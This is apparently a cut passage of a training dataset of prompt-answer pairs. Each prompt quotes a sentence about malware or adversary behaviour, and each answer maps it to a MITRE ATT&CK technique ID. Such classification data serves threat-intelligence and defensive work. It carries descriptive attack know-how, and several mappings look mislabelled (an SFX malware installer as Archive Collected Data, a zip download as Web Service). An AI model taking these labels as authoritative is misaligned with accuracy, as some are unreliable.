ATT&CK framework.,RATANKBA gathers information about the OS architecture, OS name, and OS version/Service pack.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax has used scheduled tasks to maintain persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has sent e-mails with malicious links to credential harvesting websites.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT19 HTTP malware variant decrypts strings using single-byte XOR keys.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum's backdoor deletes files after they have been successfully uploaded to C2 servers.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After encrypting C2 data, BADNEWS converts it into a hexadecimal representation and then encodes it into base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TINYTYPHON installs itself under Registry Run key to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may enable malicious activity such as modifying, replacing, or deleting specific files or directories.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BISCUIT has a command to gather the username from the system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has a module to perform any API hooking it desires.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex can enable SeDebugPrivilege and adjust token privileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variety of methods exist for compromising accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials .### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has called kill.bat for stopping services, disabling services and killing processes.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIVEHANDS can enumerate network shares and mounted drives on a network.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer can download remote files and additional payloads to the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM has leveraged a zero-day vulnerability to escalate privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use tainted shared content to move laterally.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use bootkits to persist on systems.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has established persistence through the creation of a cryptocurrency mining system service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used tools for capturing keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has run a command script to set up persistence as a scheduled task named ""WinUpdate"", as well as other encoded commands from the command-line.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The cron utility is a time-based job scheduler for Unix-like operating systems.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has modified Registry settings for default file associations to enable the opening of malicious documents.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke has the ability to discover the proxy configuration of Firefox and/or Opera.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT-C-36 has used a macro function to set scheduled tasks, disguised as those used by Google.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly has performed screen captures of victims.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, the second extension is the true file type that determines how the file is opened and executed.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Memory protections may prevent writing executable code to a process via Ptrace System Calls.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has used administrator credentials for lateral movement in compromised networks.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The startup folder path for the current user is C:\Users\\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts , Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies .### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used tools to enumerate software installed on an infected host.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files: MD5 Filename d76261ba3b624933a6ebb5dd73758db4 WmiApCom 79b68cdd0044edd4fbf8067b22878644 WmiApCom.bat The “WmiApCom.bat” file is simply used to start “WmiApCom”, which happens to be the exact same file as the one dropped by the malicious Word documents### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For connections that occur internally within an enclave , commonly used protocols are SMB, SSH, or RDP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has used chmod to modify permissions on key files for use.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver creates a shortcut file and saves it in a Startup folder to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can upload files over the C2 channel from the infected host.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Infrastructure as a Service cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data stores, which are files that manage boot application settings.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has injected a DLL library containing a Trojan into the fwmain32.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has utilized malicious VBS scripts in malware.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some strings are obfuscated with XOR x56### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,searches for files### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has encoded C2 traffic in hexadecimal format.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT gathers the victim's IP address and domain information, and then sends it to its C2 server.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has been executed via compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has a feature to create local user accounts.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hi-Zor encrypts C2 traffic with a double XOR using two distinct single-byte keys.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via Multi-hop Proxy or exfiltration of data via Traffic Duplication.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In cases where traffic manipulation is used, there may be points in the the global network where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has used base64 to encode its C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More information about the OwaAuth web shell is available in Appendix C### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel.### Assistant: T1011: Exfiltration Over Other Network Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Golden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUPY LOADER The Pupy RAT comes packaged by default with loaders that can run the RAT on a variety of platforms such as Windows, macOS, Linux and Android### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exploit software vulnerabilities in an attempt to elevate privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore’s plugins were obfuscated with Eazfuscater.NET 3.3.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FrameworkPOS can use DNS tunneling for exfiltration of credit card data.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum has used DriveLetterView to enumerate drive information.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can use vssadmin to delete volume shadow copies and bcdedit to disable recovery features.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used VBScript to execute commands and other operational tasks.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ZIP archive contains a RAR SFX which installs the malware and shows an empty PDF decoy### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can monitor services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk has called the Windows API to retrieve the hard disk handle and shut down the machine.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as PowerShell or Windows Management Instrumentation.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can use “Windows Restart Manager” to ensure files are unlocked and open for encryption.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send phishing messages to elicit sensitive information that can be used during targeting.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has used spearphishing attachments to distribute its malware.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about networks may include a variety of details, including administrative data as well as specifics regarding its topology and operations.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\Temp directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY downloads and executes additional PowerShell code and Windows binaries.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot exfiltrates data over its C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel malware can collect a list of running processes on a system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network.### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon attempts to access the ADMIN$, C$\Windows, D$\Windows, and E$\Windows shares on the victim with its current privileges.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM has used various methods of process injection including hot patching.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has downloaded source code from code repositories.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu can gather information about the victim proxy server.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet installs an RPC server for P2P communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy starts a rootkit from a malicious file dropped to disk.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A JPIN uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has encoded data as readable Latin characters.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used the Windows Command Shell and batch scripts for execution on compromised hosts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz has gained execution through victims opening malicious links.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3 shows this webshell’s code that will run supplied JScript provided in base64 encoded format within the URL within a parameter### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson uses a custom TCP protocol for C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type may create a temporary user on the system named “Lost_{Unique Identifier}.” Flame can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If Irdsnhrxxxfery64 is loaded using regsvr32.exe, it will target three processes: It will target unins000.exe if it is available### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can use Nltest tools to obtain information about the domain.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used a 30 minute delay after execution to evade sandbox monitoring tools.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete searches the File system for files of interest.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has modified the Registry to hide created user accounts from the Windows logon screen.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Threat Group-3390 tool can use WMI to execute a binary.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has also hidden Pony C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has downloaded a zip file for execution on the system.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This command history is not available to other sessions and is deleted when the session ends.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE creates and uses a VBScript as part of its persistent execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can make tokens from known credentials.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can browse file systems.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has the ability to communicate over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Launch Agents are created with user level privileges and execute with user level permissions.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware performs the following activities: Builds imports by dynamically loading APIs Decrypts strings needed for control server communications Performs control server communications Handles commands issued by the control server Uninstalls self from the system The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress()### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used ipconfig /all to obtain information about the victim network configuration.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has performed a time-based anti-debug check before downloading its third stage.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner started the cryptomining virtual machine as a service on the infected machine.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has exfiltrated files stolen from file shares.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,4H RAT sends an OS version identifier in its beacons.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can determine the IP addresses of domain controllers.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's dispatcher can establish persistence by registering a new service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity drivers and data source names.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has created Windows tasks to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can copy itself to and launch itself from hidden folders.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has attempted to get users to click on a malicious zipped file.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can create a service to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Komplex C2 channel uses an 11-byte XOR algorithm to hide data.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They also manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette has collected data and other information from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used scheduled tasks to persist on victim systems.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required.### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has been distributed through spearphishing emails with malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used .doc file extensions to mask malicious executables.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 leveraged privileged accounts to replicate directory service data with domain controllers.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Miner-C copies itself into the public folder of Network Attached Storage devices and infects new victims who open the file.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron is capable of modifying email content, headers, and attachments during transit.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has compromised victims via links to URLs hosting malicious content.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer executes payloads using the Windows API call CreateProcessW.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT can inject malicious code into process created by the “Command_Create&Inject” function.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used VBSscipt macros for execution on compromised hosts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper has created a new user and added it to the ""Remote Desktop Users"" and ""Administrators"" groups.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT is able to download and execute files located in the attachment of a received email### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy can launch interactive shells for communicating with the victim machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen Pencil has used tools that are capable of obtaining credentials from saved mail.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Regin malware platform can use Windows admin shares to move laterally.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To do so, adversaries may set the second script: parameter to reference a scriptlet file hosted on a remote site.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT lures victims into executing malicious macros embedded within Microsoft Excel documents.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Dipsind variant registers as a Winlogon Event Notify DLL to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has used a small dictionary of common passwords against a collected list of local accounts.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot will delete an associated registry key if a certain server response is received.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seasalt has the capability to identify the drive type on a victim.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis has several commands to search directories for files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In order to decide which domain xparis() holds, a variable pingadori() 